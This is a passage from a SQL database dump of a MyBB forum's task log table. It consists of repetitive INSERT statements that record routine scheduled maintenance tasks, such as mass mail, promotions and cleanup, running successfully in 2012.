'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14529', '5', '1351925130', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14528', '9', '1351924947', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14527', '3', '1351924268', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14526', '9', '1351924255', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14525', '5', '1351924046', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14524', '9', '1351923715', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14523', '5', '1351923148', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14522', '7', '1351922478', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14521', '1', '1351922461', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14520', '3', '1351922452', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14519', '9', '1351922446', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14518', '3', '1351921845', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14517', '9', '1351921826', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14516', '5', '1351921515', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14515', '9', '1351919439', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14514', '5', '1351919109', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14513', '7', '1351918840', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14512', '1', '1351918834', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14511', '3', '1351918797', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14510', '9', '1351918786', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14509', '5', '1351917903', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14508', '9', '1351917656', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14507', '3', '1351917022', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14506', '9', '1351916902', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14505', '5', '1351916882', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14504', '9', '1351916356', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14503', '5', '1351916193', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14502', '7', '1351915907', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14501', '1', '1351915653', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14500', '3', '1351915648', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14499', '9', '1351915513', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14498', '5', '1351914332', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14497', '9', '1351914241', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14496', '3', '1351914211', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14495', '7', '1351913310', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14494', '1', '1351913296', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14493', '3', '1351913203', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14492', '9', '1351913194', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14491', '5', '1351913172', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14490', '9', '1351910471', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14489', '7', '1351909901', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14488', '5', '1351909901', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14487', '3', '1351909882', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14486', '1', '1351909884', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14485', '9', '1351909881', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14484', '5', '1351907910', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14483', '9', '1351906877', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14482', '3', '1351906200', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14481', '9', '1351905920', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14480', '5', '1351905915', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14479', '9', '1351905031', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14478', '5', '1351905018', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14477', '7', '1351905018', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14476', '1', '1351905009', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14475', '3', '1351904954', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14474', '9', '1351904952', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14473', '5', '1351904295', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14472', '9', '1351901606', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14471', '5', '1351901582', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14470', '7', '1351901571', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14469', '2', '1351901083', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14468', '1', '1351901064', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14467', '3', '1351901029', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14466', '9', '1351900948', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14465', '3', '1351899906', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14464', '5', '1351899902', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14463', '9', '1351899722', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14462', '5', '1351897508', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14461', '7', '1351897250', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14460', '1', '1351897234', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14459', '3', '1351897165', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14458', '9', '1351897091', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14457', '5', '1351896413', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14456', '9', '1351896408', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14455', '3', '1351895730', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14454', '9', '1351895320', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14453', '5', '1351895315', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14452', '9', '1351894233', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14451', '5', '1351893968', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14450', '7', '1351893966', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14449', '1', '1351893960', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14448', '3', '1351893952', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14447', '9', '1351893949', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14446', '5', '1351892712', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14445', '9', '1351892560', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14444', '3', '1351891845', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14443', '9', '1351891716', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14442', '5', '1351891589', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14441', '9', '1351890638', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14440', '5', '1351890529', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14439', '7', '1351890092', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14438', '1', '1351890083', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14437', '3', '1351890071', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14436', '9', '1351889749', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14435', '5', '1351889740', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14434', '9', '1351889402', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14433', '3', '1351888215', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14432', '9', '1351888012', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14431', '5', '1351887949', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14430', '9', '1351887199', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14429', '5', '1351886701', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14428', '7', '1351886690', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14427', '1', '1351886685', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14426', '3', '1351886680', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14425', '9', '1351886294', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14424', '5', '1351885604', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14423', '3', '1351885602', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14422', '9', '1351885602', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14421', '5', '1351884607', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14420', '5', '1351884071', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14419', '7', '1351884068', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14418', '1', '1351884065', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14417', '3', '1351884054', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14416', '9', '1351884048', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14415', '5', '1351882371', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14414', '9', '1351882288', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14413', '3', '1351881025', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14412', '9', '1351881014', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14411', '5', '1351880912', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14410', '9', '1351880469', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14409', '5', '1351880446', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14408', '7', '1351879483', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14407', '1', '1351879401', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14406', '3', '1351879399', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14405', '9', '1351879397', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14404', '5', '1351878613', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14403', '9', '1351878053', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14402', '3', '1351877493', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14401', '9', '1351877109', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14400', '5', '1351877105', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14399', '9', '1351876274', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14398', '5', '1351875944', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14397', '7', '1351875629', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14396', '1', '1351875614', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14395', '3', '1351875541', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14394', '9', '1351875430', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14393', '5', '1351874926', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14392', '9', '1351874445', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14391', '3', '1351874011', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14390', '9', '1351874006', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14389', '5', '1351873569', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14388', '9', '1351873039', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14387', '5', '1351872819', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14386', '7', '1351872594', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14385', '1', '1351872356', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14384', '3', '1351872321', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14383', '5', '1351871774', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14382', '9', '1351871766', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14381', '3', '1351870577', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14380', '9', '1351870545', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14379', '5', '1351870527', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14378', '9', '1351869458', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14377', '5', '1351869119', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14376', '7', '1351869098', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14375', '1', '1351868732', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14374', '3', '1351868631', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14373', '9', '1351868426', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14372', '5', '1351867593', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14371', '9', '1351867573', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14370', '3', '1351867478', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14369', '5', '1351867285', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14368', '9', '1351867189', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14367', '5', '1351865115', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14366', '7', '1351864908', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14365', '1', '1351864885', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14364', '3', '1351864858', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14363', '9', '1351864837', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14362', '3', '1351864171', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14361', '9', '1351864159', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14360', '5', '1351864135', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14359', '7', '1351862300', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14358', '1', '1351862232', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14357', '3', '1351862210', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14356', '9', '1351862173', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14355', '5', '1351860430', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14354', '3', '1351860425', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14353', '9', '1351860408', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14352', '5', '1351860283', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14351', '9', '1351858551', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14350', '5', '1351858079', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14349', '7', '1351857858', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14348', '1', '1351857670', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14347', '3', '1351857663', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14346', '9', '1351857424', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14345', '3', '1351856950', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14344', '5', '1351856940', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14343', '9', '1351856937', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14342', '5', '1351854321', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14341', '7', '1351854142', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14340', '1', '1351854082', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14339', '3', '1351854071', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14338', '9', '1351853725', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14337', '5', '1351853158', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14336', '9', '1351853066', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14335', '5', '1351852739', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14334', '7', '1351852699', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14333', '1', '1351852653', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14332', '3', '1351852649', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14331', '9', '1351852426', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14330', '5', '1351850965', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14329', '9', '1351849701', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14328', '3', '1351848679', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14327', '9', '1351848330', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14326', '5', '1351848307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14325', '9', '1351848178', 'The mass mail task successfully ran.'); INSERT 